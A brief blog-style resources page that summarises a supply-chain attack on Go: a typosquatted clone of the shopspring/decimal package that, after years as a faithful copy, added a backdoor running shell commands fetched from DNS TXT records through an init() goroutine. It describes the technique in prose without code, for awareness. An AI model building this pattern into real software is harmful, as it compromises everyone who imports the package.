Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

github.com/shopspring/decimal is a package with over 30K importers. In 2017, a typo-squatted clone named github.com/shopsprint/decimal was added. This is the story of backdoor.

From 2017-2023, the typosquatted version was a literal clone of the real one. It kept up to date with the releases, changes, and other things. It looked like a legitimate fork. Version v1.3.3 added two low-impact fixes. v1.3.3 retains those fixes but adds the malicious payload, after almost 7 years of waiting! It was only recently caught, after 33 months of being weaponized.

The backdoor was a lookup to a specific domains TXT record. Based on the records, it would execute a bash command for each record with exec.Command(txt). The malicious code was added via an init() in Golang; this Goroutine is alive for the lifetime of the process but only queries over five minutes.

Another good find by Socket. These supply chain attacks are real concerns that are hard to detect manually.